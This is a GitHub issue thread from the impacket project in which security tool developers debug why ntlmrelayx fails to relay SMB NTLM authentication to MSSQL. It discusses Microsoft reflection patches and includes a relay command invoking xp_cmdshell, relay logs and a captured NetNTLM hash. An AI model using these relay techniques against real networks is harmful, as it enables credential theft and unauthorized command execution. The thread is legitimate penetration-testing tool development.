### ISSUE TITLE
NTLMRelayX SMB->MSSQL Failure

### ISSUE THREAD

**Issue by Meatballs1** [CoreSecurity/impacket#188]
Using xp_dirtree to invoke the MSSQL domain service account SMB against ntlmrelayx, reflecting back at the MSSQL Service...

OS: Microsoft Windows NT 6.2 (9200)
SQLServer: 12.0.4449 SP1

Note it doesn't appear to pickup the DOMAIN\USERNAME:

`[-] Authenticating against ('MSSQL', 'xxxxxxxxx', 1433, '') as \ FAILED`

Using SMBRELAYX to another host (Windows 2003 SP1) where the domain account is a local administrator dumps hashes fine. (Although trying to run a custom command I get an RPC error. )

```
python examples/ntlmrelayx.py -t mssql://xxx-xxxxx -c 'EXEC xp_cmdshell "whoami"'
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

[*] Running in relay mode to single host
[*] Config file parsed
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] Incoming connection (10.xxxxxxxxxx,54610)
[*] SMBD: Received connection from 10.xxxxxxxxxx, attacking target xxxxxxxxxx
[*] Encryption required, switching to TLS
{170: [<impacket.tds.TDS_INFO_ERROR instance at 0x7f12e8862368>], 253: [<impacket.tds.TDS_DONE instance at 0x7f12e88623f8>]}
[-] Authenticating against ('MSSQL', 'axxxxxxxxx', 1433, '') as XXXXXXXXX\SQLSVC_XXXXXXXXXXXX FAILED
[*] Encryption required, switching to TLS
[-] Authenticating against ('MSSQL', 'xxxxxxxxx', 1433, '') as \ FAILED
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.xxxxxxx,54610)
[*] Remaining connections ['SMBRelay']
```

**Comment by asolino** [comment]
Hey @Meatballs1 

Thanks for the bug report. I was able to replicate your description although there's a missing piece I think. 
The reason why it wasn't working on my side was because the system that was originating the connection had [ms08-068](https://technet.microsoft.com/en-us/library/security/ms08-068.aspx) installed, hence credentials reflection was not possible.
I think that might be the issue you are experiencing. Let me know your thoughts.

I was able to make it work, from a another domain joined machine, running under a domain user that has access to the MSSQL, then from that machine I just ran `net view \\ip-where-smb-server-is` and it successfully authenticated against the MSSQL:
```
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

[*] Running in relay mode to single host
[*] Config file parsed
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] Incoming connection (172.16.123.176,55894)
[*] SMBD: Received connection from 172.16.123.176, attacking target 172.16.123.172
[*] Encryption required, switching to TLS
{253: [<impacket.tds.TDS_DONE instance at 0x108d92680>], 227: [<impacket.tds.TDS_ENVCHANGE instance at 0x108d92638>, <impacket.tds.TDS_ENVCHANGE instance at 0x108d927e8>, <impacket.tds.TDS_ENVCHANGE instance at 0x108d92878>, <impacket.tds.TDS_ENVCHANGE instance at 0x108d92908>], 171: [<impacket.tds.TDS_INFO_ERROR instance at 0x108d92758>, <impacket.tds.TDS_INFO_ERROR instance at 0x108d928c0>], 173: [<impacket.tds.TDS_LOGIN_ACK instance at 0x108d92830>]}
[*] Authenticating against ('MSSQL', '172.16.123.172', 1433, '') as FREEFLY\normaluser7 SUCCEED
[*] normaluser7::FREEFLY:5b5b22f47398f0fb00000000000000000000000000000000:081b1bbbe18320a021aff9518aa9ff50f818080708943bdb:95a23bed69854c73
[*] Disconnecting Share(1:IPC$)
```
 On another note, I saw you using the `-c ` parameter to execute MSSQL statements at the target system after the relay happened. As far as I saw the code that is not yet implemented and that parameter only works then relaying against a SMB server. Maybe @dirkjanm wants to elaborate on this since that's his code.

In any case, all the pieces to make it work as you wanted are in the library, so we should implement that functionality (nice idea btw).

cheers.

**Comment by dirkjanm** [comment]
Yes the MSSQL relaying was just added as a PoC, without any specific attacks. Maybe in the future protocol specific options can be added, such as a MSSQL query option (which is in 8c45d98 I see), and possibly an option to run a command with xp_cmdshell if it is enabled. The query run option is great for now :+1:

**Comment by Meatballs1** [comment]
Hey @asolino I thought MS08-067 was only applicable for reflection of the same protocol.

Hence why hot potato attacks work etc.  https://foxglovesecurity.com/2016/01/16/hot-potato/

>Microsoft patched this by disallowing same-protocol NTLM authentication using a challenge that is already in flight. What this means is that SMB->SMB NTLM relay from one host back to itself will no longer work. However cross-protocol attacks such as HTTP->SMB will still work with no issue!

**Comment by Meatballs1** [comment]
Also https://bugs.chromium.org/p/project-zero/issues/detail?id=222&redir=1

**Comment by dirkjanm** [comment]
In my testing I've yet to see cross-protocol reflection such as HTTP->SMB work on the same host. I've looked at the inner working of hot potato once and couldn't pin down why that does work while over the network it doesn't.

@asolino maybe you want to put the query in a different parameter than -c, since when specifying multiple targets via a targetfile queries and commands get mixed up now.

**Comment by asolino** [comment]
Hey @Meatballs1 thanks for all your links. In fact that's a fair point. Let me investigate this further.

I just did a quick test with smbrelayx.py and I cannot reflect back HTTP->SMB under a Windows 2008 R2 whereas I can make it work under Windows 2003. That doesn't necessary mean it doesn't work because of ms08-068. There might be a bug in impacket. 

There's another tricky policy that might be generating noise in here, which is the [Server SPN target name validation level](https://technet.microsoft.com/en-us/library/jj852272(v=ws.11).aspx) that I know breaks SMB Relay if enabled. I'd need to understand how that affects cross protocol reflection as well (at first sight I think I may affect it). 

If you know about a tool that successfully works reflecting credentials back on systems post ms08-068 that'd be great to know so I compare the NTLM handshake options. 

Hot potato is another beast in here, since the NTLM handshake for local calls is different actually.

thanks!

**Comment by asolino** [comment]
Btw, [ms09-013 and ms09-014](https://blogs.technet.microsoft.com/srd/2009/04/14/ms09-013-and-ms09-014-ntlm-credential-reflection-updates-for-http-clients/) might be blocking HTTP->SMB in my tests.

**Comment by Meatballs1** [comment]
I would imagine that MSSQL is 'opted' in to the protections too :( Maybe just a local vector then. 

Oh well, SQL Service accounts seem to be often re-used across environments so probably plenty of opportunity still :)

**Comment by asolino** [comment]
I would imagine that too. But still didn't find any info. If you find any info or similar tool that works let me know.
As I said I think the local authentication is a different beast. In fact, there's no full NTLM blobs exchanged packets wise, just fewer fields and a reference to the SSPI handle that is being used (along with the [Negotiate Local Call](http://davenport.sourceforge.net/ntlm.html#theType2Message) flag). More data is available [here](http://davenport.sourceforge.net/ntlm.html#localAuthentication). It's fun I haven't found that explanation in the official MS documentation :-o.

**Comment by dirkjanm** [comment]
Just checked and reflection HTTP -> LDAP and HTTP -> MSSQL on the same host (Server 2012) isn't working either. At the end of the project zero link that @Meatballs1 posted it does mention that since June 2016 Microsoft has been working on patches adding apparently more protocols to the protection, I assume MSSQL and LDAP are among them.
